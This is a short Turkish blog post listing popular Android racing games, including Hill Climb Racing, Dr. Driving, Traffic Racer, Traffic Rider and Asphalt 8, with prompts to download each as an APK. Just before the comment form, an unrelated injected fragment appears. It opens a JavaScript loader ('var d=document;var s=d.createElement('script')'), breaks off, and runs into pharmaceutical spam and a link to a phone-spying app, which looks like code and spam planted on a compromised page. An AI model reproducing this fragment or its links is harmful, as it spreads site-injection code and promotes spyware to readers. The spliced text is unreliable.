En İyi Android Yarış Oyunları Apk İndir

Motor ve araba yarışı oyunlarını sevenler yazımızın devamını dikkatle takip etsin. Bu yazımızda sizlere en iyi 2016 android yarış oyunlarını cep telefonlarınıza indirme imkanı sunuyoruz. Birbirinden güzel ve kullanıcılar tarafından en çok oynanan yarış oyunlarını sizler için bu yazıda derledik. Özellikle yarış oyun severler için telefonda bu oyunları oynamak ayrı bir keyif verici olacaktır.

Cep Telefonu Android Yarış Oyunları İndirme

Hill Climb Racing

hill-climb-racing

Günümüzde oyuncular üzerinde bağımlılık yaratan en iyi fizik tabanlı sürüş oyunları arasındadır. Yokuş oyunlarını sevenler bir an önce telefonlarına bu oyunu kurarak başlayabilir.

Hill Climb Racing oyununu cep telefonunuza yüklemek için tıklayınız.

Dr. Driving

dr-driving

Dr. Driving geçmiş serisinin en hızlı ve görsel olarak en iyi hali diyebiliriz. Yarış ve sürüş keyfinin zirvesine çıkmaya hazır mısınız?

Dr. Driving oyununu telefonunuza kurmak için tıklayınız.

Traffic Racer

traffic-racer

Gündelik hayatta kendi arabanızla yapamadığınız yüksek hız ve tehlikeli hareketleri bu oyunda yapmaya hazır mısınız? Araba sürerken adrenalin yaşamak isteyenler için bu oyun birebir.

Traffic Racer araba yarış oyununu telefonunuza kurmak için tıklayınız.

Traffic Rider

traffic-rider

Motor tutkunları için bu oyun tam da aradıkları gibi. Sizlerde istediğiniz gibi motor sürmek istiyorsanız Traffic Rider tam da sizlere göre. 2016 mobil motor oyunları arasında en çok tercih edilenidir.

Traffic Rider oyununu cep telefonunuza kurmak için tıklayınız.

Asphalt 8: Airborne

asphalt-8-airborne

Alanında ki tüm araba yarışlarını bırakan bir cep telefonunda oynabileceğiniz en güzel mobil araba yarışı oyunudur diyebiliriz.

Asphalt 8 : Airborne oyununu indirmek için tıklayınız.

 var d=document;var s=d.createElement(‘script’); buy viagra us company http://nextlevellifting.com/blog/iphone-spy-iphone-spy-app-localizar-telefono-por-gps/

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir